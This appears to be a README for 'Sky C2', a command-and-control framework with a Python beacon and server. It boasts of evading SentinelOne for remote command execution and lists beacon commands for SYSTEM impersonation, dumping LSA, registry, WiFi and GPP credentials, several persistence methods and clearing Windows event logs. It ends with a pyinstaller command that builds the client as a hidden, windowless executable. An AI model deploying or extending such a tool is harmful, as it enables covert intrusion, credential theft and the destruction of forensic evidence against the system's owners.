SKY C2 ─────────────────────────────────────
LetsEncrypt certificates: server.crt server.key
client.py - The beacon to connect to the c2 server. server.py - The actual c2 server dubbed SkyC2
Connections use HTTPS certs with custom base64 alphabet in order to encrypt communications. So it will be required to have a TCP connection on a port that allows this communication/callback for beacons.
- At this time 6/17/25 the beacon has been used to bypass S1 (SentinelOne). Gaining a successful callback with remote command execution.
As of now until fixes are applied if your in a hardened environment and want to execute / mass execute, perform basic tasks this should be no problem.
You will need a specific version of python with pyinstaller to get the AES encryption to work. The latest versions have made it impossible to do the same AES encryption simply using 'key'.
Once LetsEncrypt expires in 90 days I plan on regenerating the certs.
Example usage / demo: python server.py -> RUN c2 Server
python client.py -> RUN CLIENT
"[ Sky - Client Help Menu ]"
"cd <dir> - Change directory"
"pwd - Print working directory"
"ls - List directory contents"
"type <file> - Show file contents"
"upload <dst> - Receive file from server"
"download <src> - Send file to server"
"sedebugpriv - Get SeDebugPrivilege Token"
"getsystem - Attempt to impersonate SYSTEM token"
"lsa - Dump LSA secrets remotely"
"registry - Dump Registry secrets remotely"
"wifi - Dump WIFI Creds"
"autologin - Get current system autologins"
"gpp - Scan GPP Passwords for AD"
"persist_startup - Persist to HKCU Run key"
"persist_task - Persist using scheduled task"
"persist_folder - Persist using the startup folder"
"clear_logs - Clear Windows Event Logs"
"exit - Exit the client"
For now I have been hosting this on digitalocean and got no complications so far.
Turn py2exe: pyinstaller --onefile --noconsole --key LiquidSky --hidden-import=unicrypto.backends.cryptography --upx-dir C:\Users\liquidsky\Downloads\c2_full_latest-SKY-C2 client.py